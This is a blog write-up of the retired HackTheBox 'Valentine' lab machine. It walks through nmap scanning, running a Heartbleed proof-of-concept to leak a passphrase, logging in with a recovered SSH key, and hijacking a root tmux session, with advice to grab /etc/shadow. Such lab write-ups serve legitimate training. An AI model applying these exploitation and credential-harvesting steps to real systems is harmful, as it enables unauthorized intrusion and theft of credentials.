Security Blog, Rants, Raves, Write-ups, and Code
Security Blog, Rants, Raves, Write-ups, and Code
Valentine
| Name: | Valentine 
|
|---|---|
| Release Date: | 17 Feb 2018 |
| Retire Date: | 28 Jul 2018 |
| OS: | Linux |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: |  |
| Radar Graph: |  |
 |
janne808  00 days, 00 hours, 58 mins, 05 seconds |
 |
echthros  00 days, 01 hours, 15 mins, 10 seconds |
| Creator: | mrb3n  |
| CherryTree File: | CherryTree - Remove the .txt extension |
Again, we start with nmap -sC -sV -Pn -p- -oA ./Valentine 10.10.10.79
$ nmap -sC -sV -Pn -p- -oA ./Valentine 10.10.10.79
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 17:16 EDT
Nmap scan report for 10.10.10.79
Host is up (0.060s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
|_ssl-date: 2020-08-27T21:21:48+00:00; +2m44s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 2m43s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.08 seconds
We've got SSH, HTTP, and HTTP on all their standard ports. Since Gobuster gets testy with self-signed certificates, let's go with Dirbuster on this one. While that's running, and as a guess from the timing and name of the box, let's also run the Heartbleed nmap script to check if it's vulnerable.
$ nmap -p443 --script ssl-heartbleed -oA ./ValHeart 10.10.10.79
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 17:23 EDT
Nmap scan report for 10.10.10.79
Host is up (0.076s latency).
PORT STATE SERVICE
443/tcp open https
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing
information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug.
The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise
encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://www.openssl.org/news/secadv_20140407.txt
| http://cvedetails.com/cve/2014-0160/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
We have officially confirmed that this is a Heartbleed box and the Dirbuster looks to have found a "hype_key" for an ssh login. Running the heartbleed python script found here, and we have to run it several times, we finally get a valid base64 string. I eventually ran it as:
sudo python heartbleed-poc.py 10.10.10.79 443 -f /home/kali/Desktop/Valentine/heartpoc.bin -n 35
and then ran strings on the resulting bin file
$ strings heartpoc.bin
<<<SNIPPED FOR BREVITY>>>
gedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
A844B51B1E7AE3A1BBCB93E5E6B7E8690BDC1E72CEDB27CE299CD81BEC2D49654315288F75B9C78F11BE9CA89C6D5D3">mac-intel</device-id>
<mac-address-list>
<mac-address>94:65:ed:80:cf:3f</mac-address></mac-address-list>
<group-select>VPN</group-select>
<group-access>https://10.10.10.79:443</group-access>
<<<SNIPPED FOR BREVITY>>>
0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
And there it is. $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
$ echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d
heartbleedbelievethehype
We have a passphrase. Navigate to https://10.10.10.79/dev/hype_key and copy that to your machine. You can do the same with /dev/notes.txt if you would like. Both are in Sub-Nodes of the Dirb/Dirbuster Node in the CTB file. Now, we have to convert the hype_key from the HEX format that it is in over to a normal RSA keyformat (which in this case is just a hex to text). We can do that easily.
Paste the HEX string from https://10.10.10.79/dev/hype_key into a hype_key.hex file
$ cat hype_key.hex | xxd -r -p > hype_key
$ cat hype_key (just for verification)
$ chmod 400 hype_key
$ ssh -i hype_key hype@10.10.10.79
Enter passphrase for key 'hype_key': heartbleedbelievethehype
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$
And again, the original HEX, the corrected Key, the nmap outputs, the notes.txt file, and the ps aux output will all be in the CTB file for your enjoyment.
Which brings me to the next part of this box's journey. LinEnum the box. There's a faster way (just run ps aux), but LinEnum (on line 642 to be exact) shows you the EXACT same info as ps aux for the privesc point and some form of Privesc Checker is a good practice to be in. Yes, I know. Reading umpteenmillion lines of mostly useless info is as boring as listening to grass grow while reading stereo instructions and simultaneously watching paint dry, but TRUST ME it's better than banging your head against a wall during a real test because you manually checked sudo -l and ps aux and all that jazz but missed a SUID set or funky config file permission set.
Ok. Now that I'm done ranting, there's a tmux session bring run as root! Think of tmux as "screen" but with more features. Personally, I still use screen, but that's because I'm "old" (in terms of IT anyway lol) and stubborn in my ways. If it ain't broke, don't fix it and remember to get off my lawn! Seriously though, tmux allows a session to stay active even if the user has to log off (just like screen does). We should be able to hijack/resume that session with:
tmux -S /.devs/dev_sess
And we've successfully done that. Grab your flags, ifconfig, and /etc/shadow file (good practice to get into if you're wanting to take the OSCP [which I haven't yet]) and you can safely say that this box is done and in the books.
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.